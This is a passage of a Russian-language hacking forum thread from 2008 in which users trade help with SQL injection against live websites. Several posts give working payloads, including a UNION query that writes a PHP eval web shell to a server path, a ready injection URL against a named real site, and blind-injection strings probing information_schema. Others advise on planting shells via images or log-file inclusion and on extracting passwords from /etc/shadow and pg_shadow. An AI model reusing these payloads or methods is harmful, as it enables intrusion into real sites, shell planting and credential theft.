Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    но т.к. стоит ORDER BY то union после него уже не работает.....
    обойти можно токо заключив все селекты в скобки... и использовав UNION ALL. но сдесь это зделать нельзя.. так что ищи еще скули перед ордером.)
     
    #2661 sabe, 21 Jul 2008
    Last edited: 21 Jul 2008
  2. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Не обязательно я не спорю, но я дал пример с использованием функции ascii(), и запрос тем самым не испортил, просто сравниваю код символа, а не символ.
    ps думаю ты меня понял...
     
  3. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Нужно обратить внимание на саму ошибку

    Query: SELECT * FROM d2ladder WHERE game = 'D2XP' and type='SC' ORDER BY 10/* DESC LIMIT 0,50
    Error: Unknown column '10' in 'order clause'

    в переменную sortBy мы передаем значение которое подставляется в конструкцию ORDER BY. Из этого можно сделать вывод, что в таблице d2ladder 9 колонок.
    А вообще иньекция интересная, есть над чем подумать...
     
    1 person likes this.
  4. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    _Pantera_
    ок 9 колонок ) только как ты запрос устроишь ? )
     
    #2664 sabe, 21 Jul 2008
    Last edited: 21 Jul 2008
    1 person likes this.
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ,а при залитии шелла через скулю можно как-то обойти ругательство на кавычки ? =______________=.

    Вот: http://site.com/news.php?id=-17+union+select+1,'<?php%20eval($_GET[‘e’]);?>',3+into+outfile+'/usr/local/www/data/partners.php'--

    Выдаёт: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php on line 35

    Ужс какой-то...
     
  6. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Велемир, нельзя :)
     
  7. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    День добрый. Подскажите пожалуйста, как корректно оформить запрос к этому ресурсу:
    http://www.clubiki.ru/index.php?page=item&id=24696)+union+select+(1

    Заранее спсибо.
     
  8. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    http://www.clubiki.ru/index.php?page=item&id=-24696)%20union%20select%201,2,version(),4,5,6/*
     
    1 person likes this.
  9. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    Народ чтото странно.
    Хочу залить шел на форум через админку там только jpeg swf и все подобные
    Мне тут сказали что в любую картинку можно вставить шел, но у меня не получается (
    Вот как я это делал картинка 1.jpeg открываю в notepad++ там иероглифы в самом конце через строчку вожу точно рабочий код шела (когда в .php он работает) вот так
    <?
    код шела
    ?>
    сохраняю в виде kartinka_shell_1.jpeg
    И когда заливаю всё нормально, делаю на главное страницы сылку на этот рисунок, жму на неё и пустой экран (
    Что я неправильно делаю?
    мб кто выложит точно рабочий шел? в jpeg
     
  10. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Омфг. Хоть в подпись себе вставляй. ПХП код исполнится только при инклуде. Или же если на сервере настроено исполнение пхп кода в имэйджах (не видел никогда такого). Без инклуда, толку от твоей картинки 0.
     
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    1. etc/htpasswd/secure

    Кто-нить знает что лежит тут?))

    2. Может такое быть,что пароли от фтп хранятся ТОЛЬКО в etc/shadow.
    3. Если лог-фаил существует, но непоказывает содержимое.Означает ли это отсутствие файла,или же нехватку прав на их просмотр ?
    4.Слышал,что через ЛЮБЫЕ лог файлы можно залить шелл,если они просматриваются...тобишь доступны.Так ли это ? (slip.log,debug.log,auth.log,ppp.log и другие).Собственно - лог файлы access и log отличаются только видом доступа.

    Да,и ещё: Какие условия необходимы для глобального инклуда в скрипте ?(Извините за нуббизм,но всё же),помимо allow_url_fopen ?


    ЗЫ: К примеру,логи админки подойдут ?

    /home/host/htdocs/admin/log/error.log
     
    #2671 Велемир, 21 Jul 2008
    Last edited: 21 Jul 2008
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Велемир,

    2. С чего ты взял что они вообще там храняца? :) Почитай -http://ru.wikipedia.org/wiki/Passwd

    3. Если лог-фаил существует...Означает ли это отсутствие файла. Ты сам-то понял чего хотел сказать?))

    4. Обязателен не только тот фактор, что они должны быть читабельны, но и что бы файл мог быть исполнен (т.е. должен быть инклюд. Это я к тому, что load_file() через скулю не прокатит) - это раз. А два - ты должен иметь возможность оставить в логе определенный след (т.е. шелл), чтобы потом его выполнить через инклюд.

    5. Иметь пустой инклюд, т.е. без предварительно вписанного какого-нибудь пути. Или ты что-то другое имел в виду?


    з.ы. по просьбам особо внимательных :) - http://ru.wikipedia.org/wiki/Passwd#.D0.A4.D0.B0.D0.B9.D0.BB_.2Fetc.2Fshadow
     
    #2672 n0ne, 22 Jul 2008
    Last edited: 22 Jul 2008
    1 person likes this.
  13. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    у меня такая проблема:
    [http://site.ru]/index.php?act=25+AND+ascii(lower(substring(user(),1,1)))=97--
    запрос проходит удачно, вытянул юзера, весию: 5.1.2.2

    далее была идея подобрать таблицы и колонки так же способом:
    index.php?act=25+and+ascii(lower(substring(table_name,1,1)))>10+from+information_schema.tables+limit+0,1--

    результата ноль. может ли кто подсказать метод раскрутки подобных скулей, хотябы теоретически.
    сайт пока не палю, когда получу от него то, что надо - выложу в соответствующей теме -)
    edited: непосредственно "кавычки" фильтруются, через char(39 / 34) не фильтрует, BENCHMARK не ощущается что проходит (скорее всего парсится).
     
    #2673 Calcutta, 22 Jul 2008
    Last edited: 22 Jul 2008
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    И как всегда,благодарим за ответ))).А отсутствие файла я имел в виду отсутствие его содержимого - пустой короче говоря)).
     
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Велемир, просто логгирование может быть отключено :) Или файл создала установка по дефолту, а потом настройки меняли и файл куда-то переехал, а остался пустой, не используемый лог-файл. Всякое может быть)


    Calcutta, ttp://forum.xaknet.ru/thread5614.html

    https://forum.antichat.ru/thread76312-blind.html


    TehRn, возможно, дыра на сайте жертвы закрыта :) Ты посмотри на дату - релиз 2005 года :)
     
    1 person likes this.
  16. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    попробуй автоматизировать, можно набросать скрипт-эксплоит на той же перловке.
    если я правильно понял, у тебя нет желания париться с ручным перебором, у меня была подобная проблемка, я ее решил на перле: https://forum.antichat.ru/showpost.php?p=743258&postcount=545

    скрипт кривоват, но суть та же.
     
    #2676 z3r0cool, 22 Jul 2008
    Last edited: 22 Jul 2008
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    вопрос собственно такой..есть скуля.. постгрескл без поле вывода..то бишь слепая..спасибо многоуважаемому SQLHACK за его прогу сипт, с её помощью вывел таблицы и колонки..но вот беда когда бручу таблицу с юзерами имена виводит нормально а вот пассы только ******** какие есть идейки?
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    :)
    Идейка есть такая:

    Ты пытаешься вывести пароли из таблицы в которой их нет, а именно-pg_user

    Пароли хранятся в таблице pg_shadow , а на прочтение её у тебя 99.9% не хватит прав
     
    4 people like this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2jokester тогда какие идеи?я не очень знаком с постгрескл..как ты говорил там присутствует pg_shadow , каким образом мне вытащить пассы или это нереально?
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Gorev , А что нужно-то?

    Ты пытаешься вынуть пароли от базы, это врятли получится.
    В базе могут быть пароли от админок CMS , форума, и т.д.
    Чего ты хочешь добиться то?
     
Thread Status:
Not open for further replies.